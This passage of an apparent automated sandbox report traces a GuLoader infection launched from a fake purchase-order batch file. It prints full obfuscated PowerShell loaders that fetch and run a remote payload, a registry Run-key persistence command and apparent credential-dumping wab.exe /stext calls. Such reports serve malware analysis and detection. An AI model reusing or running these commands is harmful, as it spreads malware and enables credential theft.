7e 9e ae 58 b1 bb 5d 79 4e cb 65 71 a4 ad 33 4f ae 18 d4 5a 09 3e f8 8e cc 71 97 74 9c 2c 15 76 e5 1f 1a da 35 f0 bc 95 a6
                                                            Data Ascii: mouh.|onaEq,+ATe:KF(w5pAtAe{`">kb#HgknC00jTcNmE<L9vglrZMCrrX+RY)A:AAnddtJI~X]yNeq3OZ>qt,v5


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:08:01:07
                                                            Start date:28/08/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO_GM_list_28082024202003180817418280824_purchase_doc_00000(991KB).bat" "
                                                            Imagebase:0x7ff7064b0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:1
                                                            Start time:08:01:07
                                                            Start date:28/08/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:2
                                                            Start time:08:01:07
                                                            Start date:28/08/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell.exe -windowstyle hidden "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.)La ') ;Sloshily (Indbandtes ' r$Stg ul RoRkbPlaDul O:ObFgroRurPaeLidSartraDrgResV.sViaI.lnoeUnnB,e ,=Su$ ogO,lSkoLabDeaw lMi: CS .oRelcobSfrSpbBauSns kC,s 7Se3,a+E,+E,%Ls$ElBunllaoSud,ns ,kKoaAlmNosB,f,io RrSvh SoSal.od Ts n..rc .o ,uSyn ,t,n ') ;$Reveled=$Blodskamsforholds[$Foredragssalene];}$Governorates=288320;$Supermagtsstrategiernes=27821;Sloshily (Indbandtes ' U$ QgCalSmoC,bL,aFelNo:AmU dD l.nu efMitNonTri nns gOye Ir anFie , Fl=.o DaGRoeNotUn-FoCSnoWhnBot eCin tad Dr$suGUneWorCim Da.ln CiHieUns,e ');Sloshily (Indbandtes ',p$FjgLulSnocib IaGll.o:C.KP lp,iNep,opUnebigskuAulBevHyeAmtAg Be=Ac P[JoSU,yBis,atUne nmBo. vC.co InNovSveFurTit.i]Sk:.e:,aF ,rFioa.mWhBCoaPesCaeTo6An4AlS.itGerP i.rnP gG.(Te$GeU CdInlh uV,fLutRen iBanU,gP eS,rpanU eAp) v ');Sloshily (Indbandtes 'Vl$Ungkvl So bPra,olPe: DIFlm,aaCog i,onCueE.d.e me=En ad[BiS FyRys .tKueedm S.EqT eL x Dt L. .EVan,uc UoFldFliInnBogPa]Br:Up: ,ASaS aC.dI iIh .FiGA e,itMuSFotSor .iSkn Kg.u(St$CaKt lvei yp Op.leTog eu il,vvFle ,tPo)Os ');Sloshily (Indbandtes ' p$wigUrlUnoAbbBoaA lSm:V RUnuBrm.nsTutSleBurXaeFedFaesp=K,$ vISamNoaP,gSiiArn .eKod.f.H sEyuPrbE s LtBerEriI n egSa(Di$ iGImoUdvSae UrHonAaoUprKoaOvt EeElsNv,b.$ dSV,uTipS eDor,rm,iaBigAftAfsDes BtIsrFaaFrtV,ebeg.li ee VrI n ie .smo)Al ');Sloshily $Rumsterede;"
                                                            Imagebase:0x7ff788560000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2469006444.0000020B6C824000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:3
                                                            Start time:08:01:07
                                                            Start date:28/08/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:4
                                                            Start time:08:01:10
                                                            Start date:28/08/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Negligent.Gas && echo t"
                                                            Imagebase:0x7ff7064b0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:5
                                                            Start time:08:01:16
                                                            Start date:28/08/2024
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.)La ') ;Sloshily (Indbandtes ' r$Stg ul RoRkbPlaDul O:ObFgroRurPaeLidSartraDrgResV.sViaI.lnoeUnnB,e ,=Su$ ogO,lSkoLabDeaw lMi: CS .oRelcobSfrSpbBauSns kC,s 7Se3,a+E,+E,%Ls$ElBunllaoSud,ns ,kKoaAlmNosB,f,io RrSvh SoSal.od Ts n..rc .o ,uSyn ,t,n ') ;$Reveled=$Blodskamsforholds[$Foredragssalene];}$Governorates=288320;$Supermagtsstrategiernes=27821;Sloshily (Indbandtes ' U$ QgCalSmoC,bL,aFelNo:AmU dD l.nu efMitNonTri nns gOye Ir anFie , Fl=.o DaGRoeNotUn-FoCSnoWhnBot eCin tad Dr$suGUneWorCim Da.ln CiHieUns,e ');Sloshily (Indbandtes ',p$FjgLulSnocib IaGll.o:C.KP lp,iNep,opUnebigskuAulBevHyeAmtAg Be=Ac P[JoSU,yBis,atUne nmBo. vC.co InNovSveFurTit.i]Sk:.e:,aF ,rFioa.mWhBCoaPesCaeTo6An4AlS.itGerP i.rnP gG.(Te$GeU CdInlh uV,fLutRen iBanU,gP eS,rpanU eAp) v ');Sloshily (Indbandtes 'Vl$Ungkvl So bPra,olPe: DIFlm,aaCog i,onCueE.d.e me=En ad[BiS FyRys .tKueedm S.EqT eL x Dt L. .EVan,uc UoFldFliInnBogPa]Br:Up: ,ASaS aC.dI iIh .FiGA e,itMuSFotSor .iSkn Kg.u(St$CaKt lvei yp Op.leTog eu il,vvFle ,tPo)Os ');Sloshily (Indbandtes ' p$wigUrlUnoAbbBoaA lSm:V RUnuBrm.nsTutSleBurXaeFedFaesp=K,$ vISamNoaP,gSiiArn .eKod.f.H sEyuPrbE s LtBerEriI n egSa(Di$ iGImoUdvSae UrHonAaoUprKoaOvt EeElsNv,b.$ dSV,uTipS eDor,rm,iaBigAftAfsDes BtIsrFaaFrtV,ebeg.li ee VrI n ie .smo)Al ');Sloshily $Rumsterede;"
                                                            Imagebase:0xa20000
                                                            File size:433'152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2206071533.0000000008740000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2199790164.0000000005B55000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.2206269200.000000000C162000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:6
                                                            Start time:08:01:17
                                                            Start date:28/08/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Negligent.Gas && echo t"
                                                            Imagebase:0x240000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:10
                                                            Start time:08:01:36
                                                            Start date:28/08/2024
                                                            Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                            Imagebase:0xcb0000
                                                            File size:516'608 bytes
                                                            MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:false

                                                            General

                                                            Target ID:11
                                                            Start time:08:01:47
                                                            Start date:28/08/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ /d "%outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)"
                                                            Imagebase:0x240000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:12
                                                            Start time:08:01:47
                                                            Start date:28/08/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:13
                                                            Start time:08:01:47
                                                            Start date:28/08/2024
                                                            Path:C:\Windows\SysWOW64\reg.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ /d "%outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)"
                                                            Imagebase:0x9c0000
                                                            File size:59'392 bytes
                                                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:15
                                                            Start time:08:01:56
                                                            Start date:28/08/2024
                                                            Path:C:\Windows\SysWOW64\wscript.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Andragendet8.vbs"
                                                            Imagebase:0xc10000
                                                            File size:147'456 bytes
                                                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            General

                                                            Target ID:16
                                                            Start time:08:01:56
                                                            Start date:28/08/2024
                                                            Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nywdnxhzquvbdzxsrjdoxzvr"
                                                            Imagebase:0xcb0000
                                                            File size:516'608 bytes
                                                            MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:17
                                                            Start time:08:01:56
                                                            Start date:28/08/2024
                                                            Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nywdnxhzquvbdzxsrjdoxzvr"
                                                            Imagebase:0xcb0000
                                                            File size:516'608 bytes
                                                            MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:18
                                                            Start time:08:01:57
                                                            Start date:28/08/2024
                                                            Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\yakooqrtecnnfflwatqqaeiadgh"
                                                            Imagebase:0xcb0000
                                                            File size:516'608 bytes
                                                            MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:19
                                                            Start time:08:01:57
                                                            Start date:28/08/2024
                                                            Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iupgoicvskfsqlharedrlrcrlmrxexz"
                                                            Imagebase:0xcb0000
                                                            File size:516'608 bytes
                                                            MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:20
                                                            Start time:08:01:58
                                                            Start date:28/08/2024
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,e4 t ');Tilfredsstillelse (Viscometres ' H$Pag il RoKrbP.aRilVe:InFVuuPosUni Bo Bn,os .a TaRerBeeArn aeU =Am( ,TS.eDusUntE,-ciPUna tMihMa I$VaRBle ahDuaUnrEmd eFenGa)Pr ') ;Tilfredsstillelse (Viscometres ' $ IgArlBlocob Na,ulAr: kutadAgs ,i Ug TeFon UdJee S=F $,og Jl,roR,bEgaTalAf:R APomAlpFaeWirTeeCamNoeU tHirEkeFanNoePi+to+Au%.e$FaL AeGav pe .r e SdSkeTasIm..ucChol uPhn.otLo ') ;$Bageriers=$Leveredes[$udsigende];}$Callovian=319492;$Malaceae=27246;Tilfredsstillelse (Viscometres ' a$Lig.bl OoBab Haunl T:,hXPueEknSto ,pBeh oAmn BtToimacGa2 E4B 9Du Un=M, L.G.reUntTr- CCFuo.rn.utVee nSpt O F$stRHyeMahCia .r,edMaeKknDi ');Tilfredsstillelse (Viscometres ' $AmgTrlG,oOvbNoa,ul A:.eHGry.epIno Cc nh IoTel ,eResTotF,e ArB,i BnD.eLkmApi.ra.s En=Gr ,e[diS .yRes rt MeS.m a. oCT,osonV,vB.eBerG.tBe] s:Re:U,FR,rraoB mAyBSkahos,aeSt6.h4DuSCotI r.riConGrgRe(Sp$ScX AeAbnS,oInpO.h DoavnMetLiiOvcVa2B,4Ra9 ) , ');Tilfredsstillelse (Viscometres ',o$.rgf,l KoDyb,oaPhlT :SaG dhKreHatInt KoAne Ms S ,e=Ge K,[N,S TyIbs,at,fecomIn. eTlae Sx Rt U. SESpnS cAroFod,eiPanN,ggi]Ko:Ud:VeA.nSUnC.nIApI R.CyGPaeBitPoS 